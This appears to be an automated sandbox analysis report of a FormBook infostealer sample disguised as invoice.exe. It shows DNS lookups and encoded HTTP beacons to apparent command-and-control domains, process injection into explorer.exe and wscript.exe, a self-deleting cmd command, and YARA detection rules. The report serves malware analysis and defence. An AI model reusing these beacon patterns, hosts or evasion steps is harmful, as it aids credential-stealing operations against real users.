                                                                            Apr 8, 2021 12:05:28.296029091 CEST5926153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:28.329763889 CEST53592618.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:28.497765064 CEST5715153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:28.774436951 CEST53571518.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:34.462431908 CEST5941353192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:34.527434111 CEST53594138.8.8.8192.168.2.5

                                                                            ICMP Packets

                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Apr 8, 2021 12:05:07.034640074 CEST192.168.2.58.8.8.8cffd(Port unreachable)Destination Unreachable
                                                                            Apr 8, 2021 12:05:08.358998060 CEST192.168.2.58.8.8.8cffd(Port unreachable)Destination Unreachable

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Apr 8, 2021 12:04:21.582397938 CEST192.168.2.58.8.8.80x3722Standard query (0)www.flowhcf.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.059622049 CEST192.168.2.58.8.8.80x5ca1Standard query (0)www.jinlan.onlineA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.486022949 CEST192.168.2.58.8.8.80xc2f0Standard query (0)www.armaccountingbs.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:42.619398117 CEST192.168.2.58.8.8.80xe949Standard query (0)www.zmid.xyzA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:48.228594065 CEST192.168.2.58.8.8.80x6c76Standard query (0)www.sookepointcargo.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:53.898787022 CEST192.168.2.58.8.8.80x6c6dStandard query (0)www.dateyourlovelive.clubA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:58.948373079 CEST192.168.2.58.8.8.80x5abbStandard query (0)www.knoxvilleoutdoorkitchens.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:04.512552977 CEST192.168.2.58.8.8.80x2eaStandard query (0)www.gunungbatufrozen.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:05.506127119 CEST192.168.2.58.8.8.80x2eaStandard query (0)www.gunungbatufrozen.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:06.521694899 CEST192.168.2.58.8.8.80x2eaStandard query (0)www.gunungbatufrozen.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:11.724265099 CEST192.168.2.58.8.8.80x9951Standard query (0)www.highdeserthealthinsurance.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.043440104 CEST192.168.2.58.8.8.80x52bdStandard query (0)www.hotelmaktub.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.309679031 CEST192.168.2.58.8.8.80x2d71Standard query (0)www.legacyadmin.supportA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:28.497765064 CEST192.168.2.58.8.8.80x9df1Standard query (0)www.arizonagridiron.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.462431908 CEST192.168.2.58.8.8.80x8974Standard query (0)www.harshdeepfashion.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Apr 8, 2021 12:04:21.624262094 CEST8.8.8.8192.168.2.50x3722No error (0)www.flowhcf.comflowhcf.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:04:21.624262094 CEST8.8.8.8192.168.2.50x3722No error (0)flowhcf.com184.168.131.241A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST8.8.8.8192.168.2.50x5ca1No error (0)www.jinlan.onlinewww.jinlan.online.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST8.8.8.8192.168.2.50x5ca1No error (0)www.jinlan.online.s.strikinglydns.com35.156.117.131A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:32.387444973 CEST8.8.8.8192.168.2.50x5ca1No error (0)www.jinlan.online.s.strikinglydns.com18.157.120.97A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.528493881 CEST8.8.8.8192.168.2.50xc2f0No error (0)www.armaccountingbs.comarmaccountingbs.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:04:37.528493881 CEST8.8.8.8192.168.2.50xc2f0No error (0)armaccountingbs.com2.57.90.16A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:42.979065895 CEST8.8.8.8192.168.2.50xe949No error (0)www.zmid.xyzghs.google.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:04:48.836759090 CEST8.8.8.8192.168.2.50x6c76Server failure (2)www.sookepointcargo.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:53.926758051 CEST8.8.8.8192.168.2.50x6c6dName error (3)www.dateyourlovelive.clubnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:04:59.105505943 CEST8.8.8.8192.168.2.50x5abbNo error (0)www.knoxvilleoutdoorkitchens.com208.91.197.91A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:06.674634933 CEST8.8.8.8192.168.2.50x2eaServer failure (2)www.gunungbatufrozen.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:07.034513950 CEST8.8.8.8192.168.2.50x2eaServer failure (2)www.gunungbatufrozen.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:08.358870983 CEST8.8.8.8192.168.2.50x2eaServer failure (2)www.gunungbatufrozen.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:11.765930891 CEST8.8.8.8192.168.2.50x9951No error (0)www.highdeserthealthinsurance.com74.208.236.64A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST8.8.8.8192.168.2.50x52bdNo error (0)www.hotelmaktub.comhotelmaktub.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST8.8.8.8192.168.2.50x52bdNo error (0)hotelmaktub.com177.55.108.130A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:17.880172968 CEST8.8.8.8192.168.2.50x52bdNo error (0)hotelmaktub.com187.84.225.36A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST8.8.8.8192.168.2.50x2d71No error (0)www.legacyadmin.supportlegacyadmin.supportCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST8.8.8.8192.168.2.50x2d71No error (0)legacyadmin.support192.0.78.24A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:23.336853981 CEST8.8.8.8192.168.2.50x2d71No error (0)legacyadmin.support192.0.78.25A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:28.774436951 CEST8.8.8.8192.168.2.50x9df1No error (0)www.arizonagridiron.com23.27.42.72A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST8.8.8.8192.168.2.50x8974No error (0)www.harshdeepfashion.com216.239.34.21A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST8.8.8.8192.168.2.50x8974No error (0)www.harshdeepfashion.com216.239.36.21A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST8.8.8.8192.168.2.50x8974No error (0)www.harshdeepfashion.com216.239.38.21A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:05:34.527434111 CEST8.8.8.8192.168.2.50x8974No error (0)www.harshdeepfashion.com216.239.32.21A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.flowhcf.com
                                                                            • www.jinlan.online
                                                                            • www.armaccountingbs.com
                                                                            • www.knoxvilleoutdoorkitchens.com
                                                                            • www.highdeserthealthinsurance.com
                                                                            • www.hotelmaktub.com
                                                                            • www.legacyadmin.support

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.549717184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:04:21.809030056 CEST1544OUTGET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1
                                                                            Host: www.flowhcf.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:22.028017998 CEST1545INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Thu, 08 Apr 2021 10:04:21 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://www.flowhcf.org/e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.54971835.156.117.13180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:04:32.408296108 CEST1545OUTGET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1
                                                                            Host: www.jinlan.online
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.5497192.57.90.1680C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:04:37.571713924 CEST1546OUTGET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.armaccountingbs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:37.611836910 CEST1547INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.16.1
                                                                            Date: Thu, 08 Apr 2021 10:04:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 153
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.549725208.91.197.9180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:04:59.252139091 CEST1646OUTGET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.knoxvilleoutdoorkitchens.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:04:59.498363972 CEST1648INHTTP/1.1 200 OK
                                                                            Date: Thu, 08 Apr 2021 10:04:59 GMT
                                                                            Server: Apache
                                                                            Set-Cookie: vsid=926vr3654218993933208; expires=Tue, 07-Apr-2026 10:04:59 GMT; Max-Age=157680000; path=/; domain=www.knoxvilleoutdoorkitchens.com; HttpOnly
                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jc9joRJOg7xepppfUjhgNUfaQZzFQ8rnfCxQRWJh90VSrWOsDLcYcPwxAW8oD+eV6/1Kf7dQa9exp2BXhMPJvQ==
                                                                            Content-Length: 2723
                                                                            Keep-Alive: timeout=5, max=123
                                                                            Connection: Keep-Alive
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6e 6f 78 76 69 6c 6c 65 6f 75 74 64 6f 6f 72 6b 69 74 63 68 65 6e 73 2e 63 6f 6d 2f 3f 66 70 3d 61 63 6a 56 78 4f 32 34 72 75 42 45 31 62 53 6e 41 4a 4f 4f 46 65 5a 39 64 32 25 32 42 69 6c 6c 33 68 57 65 62 63 4d 48 65 6e 65 72 79 71 64 65 33 34 61 6c 6a 4b 38 67 37 4c 35 63 4d 48 67 6f 32 59 35 30 72 51 71 4f 4b 63 69 4e 72 36 6c 72 62 63 68 6b 44 7a 6e 6f 48 59 53 61 65 71 35 25 32 46 69 45 62 56 51 4f 76 6c 53 51 33 4b 70 6a 37 4f 50 63 49 38 55 41 4f 48 65 6b 6b 71 7a 33 51 48 31 76 4b 4d 73 59 7a 64 71 54 57 6c 52 66 65 52 6e 66 70 71 73 44 25 32 42 76 4c 30 6d 25 32 42 68 61 69 44 77 73 6f 75 42 4e 57 41 7a 64 50 25 32 46 59 68 51 58 49 76 38 5a 55 76 4a 42 6c 56 59 51 6e 72 44 79 6d 44 26 70 72 76 74 6f 66 3d 78 4a 34 43 74 5a 31 34 4e 72 4b 72 77 73 6c 52 31 64 58 4d 4b 38 30 63 72 58 6a 57 46 37 73 4b 68 6b 62 5a 34 47 4e 39 42 78 45 25 33 44 26 70 6f 72 75 3d 4e 62 56 72 69 6b 79 69 73 34 61 7a 25 32 42 74 62 53 74 51 45 64 44 75 69 32 32 5a 52 46 78 63 36 71 56 71 59 62 6b 49 36 4f 4c 54 30 38 64 6a 54 4a 39 71 79 31 66 72 58 55 39 53 56 4d 66 39 39 4b 4c 42 39 67 6f 34 6c 30 72 46 38 41 74 25 32 42 69 41 42 71 25 32 46 6a 64 43 64 51 4a 64 70 30 70 62 6f 30 4b 34 47 75 78 45 4c 55 65 79 6f 53 35 77 75 64 4a 44 6b 50 44 66 33 4a 70 59 66 32 41 43 61 47 78 36 4b 31 51 5a 64 51 31 38 34 46 25 32 42 35 4c 69 46 61 30 6d 63 78 52 55 76 72 47 59 4a 37 78 42 59 57 79 7a 42 51 25 32 46 65 79 79 37 77 25 32 46 32 33 77 4f 54 4b 75 42 66 7a 45 46 77 61 37 34 56 75 57 30 53 70 63 36 59 43 6f 4d 49 36 45 4e 72 44 6b 77 67 55 33 68 67 25 33 44 25 33 44 26 63 69 66 72 3d 31 26 77 30 47 3d 33 77 34 51 48 56 72 4a 4f 43 69 6d 74 39 30 5a 54 65 4b 58 4d 65 37 5a 72 59 62 34 62 6e 6b 7a 76 37 51 5a 7a 75 66 6a 50 71 68 46 42 50 47 51 31 53 72 4a 25 32 46 77 46 73 48 79 36 6c 71 64 71 51 42 6c 72 30 26 75 46 51 6c 3d 58 50 37 48 4d 54 5f 38 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50
                                                                            Data Ascii: ...top.location="http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g7L5cMHgo2Y50rQqOKciNr6lrbchkDznoHYSaeq5%2FiEbVQOvlSQ3Kpj7OPcI8UAOHekkqz3QH1vKMsYzdqTWlRfeRnfpqsD%2BvL0m%2BhaiDwsouBNWAzdP%2FYhQXIv8ZUvJBlVYQnrDymD&prvtof=xJ4CtZ14NrKrwslR1dXMK80crXjWF7sKhkbZ4GN9BxE%3D&poru=NbVrikyis4az%2BtbStQEdDui22ZRFxc6qVqYbkI6OLT08djTJ9qy1frXU9SVMf99KLB9go4l0rF8At%2BiABq%2FjdCdQJdp0pbo0K4GuxELUeyoS5wudJDkPDf3JpYf2ACaGx6K1QZdQ184F%2B5LiFa0mcxRUvrGYJ7xBYWyzBQ%2Feyy7w%2F23wOTKuBfzEFwa74VuW0Spc6YCoMI6ENrDkwgU3hg%3D%3D&cifr=1&w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ%2FwFsHy6lqdqQBlr0&uFQl=XP7HMT_8";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.54973174.208.236.6480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:05:11.900079012 CEST5238OUTGET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.highdeserthealthinsurance.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:12.034537077 CEST5238INHTTP/1.1 302 Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Date: Thu, 08 Apr 2021 10:05:11 GMT
                                                                            Server: Apache/2.4.10 (Debian)
                                                                            Cache-Control: no-cache
                                                                            Location: http://raygemme.com/e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.549732177.55.108.13080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:05:18.088413954 CEST5243OUTGET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1
                                                                            Host: www.hotelmaktub.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:18.292332888 CEST5243INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 08 Apr 2021 10:05:18 GMT
                                                                            Server: Apache/2.4.20 (Unix) OpenSSL/1.0.1e-fips
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 33 72 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /e3rs/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.549734192.0.78.2480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:05:23.354604006 CEST5273OUTGET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.legacyadmin.support
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:23.483477116 CEST5273INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Thu, 08 Apr 2021 10:05:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8
                                                                            X-ac: 3.mxp _dca
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:12:03:22
                                                                            Start date:08/04/2021
                                                                            Path:C:\Users\user\Desktop\invoice.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\invoice.exe'
                                                                            Imagebase:0x800000
                                                                            File size:894464 bytes
                                                                            MD5 hash:492017E064CAB97DD8EA27ABD3E5CFCA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:12:03:31
                                                                            Start date:08/04/2021
                                                                            Path:C:\Users\user\Desktop\invoice.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\invoice.exe
                                                                            Imagebase:0xd70000
                                                                            File size:894464 bytes
                                                                            MD5 hash:492017E064CAB97DD8EA27ABD3E5CFCA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:12:03:33
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff693d90000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:03:49
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                            Imagebase:0xe0000
                                                                            File size:147456 bytes
                                                                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:03:54
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\invoice.exe'
                                                                            Imagebase:0x1c0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
